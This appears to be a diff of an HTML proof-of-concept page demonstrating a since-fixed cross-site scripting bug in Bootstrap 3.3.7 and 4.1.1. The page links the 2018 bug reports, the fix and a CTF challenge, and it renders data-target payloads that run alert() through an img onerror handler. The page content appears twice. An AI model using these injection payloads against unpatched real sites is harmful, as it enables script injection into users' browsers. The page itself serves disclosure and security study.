Jinmo · June 3, 2018 02:00
diff --git a/test.html b/test.html
 <html>

 <head>
 </head>

 <body>
    <style type="text/css">
    body {
        margin: 0;
    }

    a {
        color: #007bff;
        text-decoration: none;
        background-color: transparent;
    }

    * {
        font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif;
    }

    textarea {
        width: 100%;
        height: 300px;
        border: 1px solid #ccc;
        border-radius: 0.5rem;
        padding: 1rem;
        font-family: Consolas, monospace;
        resize: none;
        font-size: 1rem;
    }
    iframe {
        width: 50%;
        margin: 0;
        border: none;
        float: left;
    }

    body>div {
        width: 50%;
        float: left;
        box-sizing: border-box;
        padding: 1rem;
    }

    body>h1, p {
        margin: 0;
        padding: 1rem;
    }
    p { line-height: 180%; }
    body h2 {
    	margin: 1rem;
    }
    h1, h2 {
        font-weight: 500;
    }
    </style>
    <h1>Bootstrap XSS</h1>
    <p>
        further to <a href="https://github.com/twbs/bootstrap/issues/20184">Issue #20184</a>, and an exploit for SecurityFest CTF (2018) - Excess Ess2 by @avlidienbrunn
        <br/>
        It's reported(2018-05-30) on
            <a href="https://github.com/twbs/bootstrap/issues/26625">#26625</a>,
            <a href="https://github.com/twbs/bootstrap/issues/26627">#26627</a>,
            <a href="https://github.com/twbs/bootstrap/issues/26628">#26628</a>
            by
            <a href="https://github.com/1Jesper1">@1Jesper1</a>
            , and fixed(2018-06-01) on
            <a href="https://github.com/twbs/bootstrap/pull/26630">#26630</a>
            by <a href="https://github.com/Johann-S">@Johann-S</a>
    </p>
    <div>
        <h2>v4</h2>
        <textarea id=v3>
 <html><head>
 <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
 <meta data-spy=scroll
 data-target="<img src=a: onerror=alert('hello_from_v4');alert=1>"></textarea>
    </div>
    <div>
        <h2>v3</h2>
        <textarea id=v4>
 <html><head>
 <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
 <meta data-spy=affix
 data-target="<img src=a: onerror=alert('hello_from_v3')>"></textarea>
    </div>
    <script>
    var textarea = document.getElementsByTagName('textarea');
    var css = document.getElementsByTagName('style')[0].outerHTML;
    for (var i = 0; i < textarea.length; i++) {
        var iframe = document.createElement('iframe');
        iframe.srcdoc = css + textarea[i].value + '<h1>' + textarea[i].id + ' test</h1>';
        document.body.appendChild(iframe);
    }
    </script>
 </body>
	<html>

	<head>
	</head>

	<body>
	<style type="text/css">
	body {
	margin: 0;
	}

	a {
	color: #007bff;
	text-decoration: none;
	background-color: transparent;
	}

	* {
	font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif;
	}

	textarea {
	width: 100%;
	height: 300px;
	border: 1px solid #ccc;
	border-radius: 0.5rem;
	padding: 1rem;
	font-family: Consolas, monospace;
	resize: none;
	font-size: 1rem;
	}
	iframe {
	width: 50%;
	margin: 0;
	border: none;
	float: left;
	}

	body>div {
	width: 50%;
	float: left;
	box-sizing: border-box;
	padding: 1rem;
	}

	body>h1, p {
	margin: 0;
	padding: 1rem;
	}
	p { line-height: 180%; }
	body h2 {
	margin: 1rem;
	}
	h1, h2 {
	font-weight: 500;
	}
	</style>
	<h1>Bootstrap XSS</h1>
	<p>
	further to <a href="https://github.com/twbs/bootstrap/issues/20184">Issue #20184</a>, and an exploit for SecurityFest CTF (2018) - Excess Ess2 by @avlidienbrunn
	<br/>
	It's reported(2018-05-30) on
	<a href="https://github.com/twbs/bootstrap/issues/26625">#26625</a>,
	<a href="https://github.com/twbs/bootstrap/issues/26627">#26627</a>,
	<a href="https://github.com/twbs/bootstrap/issues/26628">#26628</a>
	by
	<a href="https://github.com/1Jesper1">@1Jesper1</a>
	, and fixed(2018-06-01) on
	<a href="https://github.com/twbs/bootstrap/pull/26630">#26630</a>
	by <a href="https://github.com/Johann-S">@Johann-S</a>
	</p>
	<div>
	<h2>v4</h2>
	<textarea id=v3>
	<html><head>
	<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
	<meta data-spy=scroll
	data-target="<img src=a: onerror=alert('hello_from_v4');alert=1>"></textarea>
	</div>
	<div>
	<h2>v3</h2>
	<textarea id=v4>
	<html><head>
	<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
	<meta data-spy=affix
	data-target="<img src=a: onerror=alert('hello_from_v3')>"></textarea>
	</div>
	<script>
	var textarea = document.getElementsByTagName('textarea');
	var css = document.getElementsByTagName('style')[0].outerHTML;
	for (var i = 0; i < textarea.length; i++) {
	var iframe = document.createElement('iframe');
	iframe.srcdoc = css + textarea[i].value + '<h1>' + textarea[i].id + ' test</h1>';
	document.body.appendChild(iframe);
	}
	</script>
	</body>
No results found